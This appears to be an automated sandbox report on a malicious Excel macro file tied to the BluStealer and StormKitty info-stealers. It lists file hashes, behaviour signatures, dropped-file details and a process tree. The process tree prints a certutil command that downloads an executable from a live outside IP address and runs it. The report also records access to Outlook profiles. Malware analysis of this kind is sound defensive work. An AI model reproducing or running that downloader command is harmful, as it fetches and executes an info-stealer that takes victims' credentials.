Analysis

  • max time kernel
    101s
  • max time network
    51s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    06-09-2022 21:27

General

  • Target

    286368248040.xlsm

  • Size

    42KB

  • MD5

    5cdfa549f5e80c05cf53baec3ebaab42

  • SHA1

    5c7653c921c7414ebb0407d92bb7e84866572e9a

  • SHA256

    462e92b06c97f897081e9a438b5bda04bd199e32690e9a04d063d485545e3da5

  • SHA512

    c3b964067e294b1fe738f8359a7bfc3ed5401495dd8510ec0c7a6184dc8d62802859874286da4d80f0cf7a514ac474de98e5111436eb893e328a64d3d87a8f58

  • SSDEEP

    768:EvjcKv+ssnbaBIJYfTH+niSpivDHvJv+nWtFFiKk/f/qt1pTxRN+nkaszH:EvLv+TbaG1B+TvJv+OFFi3/Hq31xikaQ

Malware Config

Signatures

  • BluStealer

    A Modular information stealer written in Visual Basic.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 4 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Office loads VBA resources, possible macro or embedded object present
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\286368248040.xlsm
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1928
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c certutil.exe -urlcache -split -f "http://195.178.120.230/doctor/tikto.exe" Ogeczxegtyqonfibmt.exe.exe && Ogeczxegtyqonfibmt.exe.exe
      2⤵
      • Process spawned unexpected child process
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1448
      • C:\Windows\SysWOW64\certutil.exe
        certutil.exe -urlcache -split -f "http://195.178.120.230/doctor/tikto.exe" Ogeczxegtyqonfibmt.exe.exe
        3⤵
          PID:968
        • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
          Ogeczxegtyqonfibmt.exe.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1064
          • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
            C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1804
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              5⤵
              • Accesses Microsoft Outlook profiles
              • Checks processor information in registry
              • Suspicious use of AdjustPrivilegeToken
              • outlook_office_path
              • outlook_win_path
              PID:1340

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe

      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe

      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

    • C:\Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe

      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

    • \Users\Admin\Documents\Ogeczxegtyqonfibmt.exe.exe

      Filesize

      22KB

      MD5

      08b2333c8a3dd59e9ee7fa36684bddce

      SHA1

      a21975e4d5fd409ae791997d63aac4fc3e6165bc

      SHA256

      155c5fe41943219ffa5a38c74430d8f7e910f16e23e26f1cdd0d39de70c54fb7

      SHA512

      9748d5c5c59d53ab6458b888a40126b08d5cb300e83749c6abdea438fb4a28b4850521c0436e61daf3ac28dcda9f5260d3909967855d039f6bdca2a7aeac2c35

    • memory/1064-70-0x0000000005D70000-0x0000000005F2A000-memory.dmp

      Filesize

      1.7MB

    • memory/1064-68-0x0000000000D60000-0x0000000000D6C000-memory.dmp

      Filesize

      48KB

    • memory/1340-86-0x0000000000090000-0x00000000000AA000-memory.dmp

      Filesize

      104KB

    • memory/1340-84-0x0000000000090000-0x00000000000AA000-memory.dmp

      Filesize

      104KB

    • memory/1340-91-0x0000000000090000-0x00000000000AA000-memory.dmp

      Filesize

      104KB

    • memory/1340-89-0x0000000000090000-0x00000000000AA000-memory.dmp

      Filesize

      104KB

    • memory/1804-71-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-93-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-72-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-74-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-76-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-95-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1804-80-0x0000000000400000-0x0000000000422000-memory.dmp

      Filesize

      136KB

    • memory/1928-56-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1928-55-0x0000000070D81000-0x0000000070D83000-memory.dmp

      Filesize

      8KB

    • memory/1928-54-0x000000002F781000-0x000000002F784000-memory.dmp

      Filesize

      12KB

    • memory/1928-57-0x0000000071D6D000-0x0000000071D78000-memory.dmp

      Filesize

      44KB

    • memory/1928-58-0x0000000074AD1000-0x0000000074AD3000-memory.dmp

      Filesize

      8KB

    • memory/1928-59-0x00000000006C8000-0x00000000006CC000-memory.dmp

      Filesize

      16KB

    • memory/1928-94-0x0000000071D6D000-0x0000000071D78000-memory.dmp

      Filesize

      44KB

    • memory/1928-60-0x00000000006C8000-0x00000000006CC000-memory.dmp

      Filesize

      16KB

    • memory/1928-96-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/1928-97-0x0000000071D6D000-0x0000000071D78000-memory.dmp

      Filesize

      44KB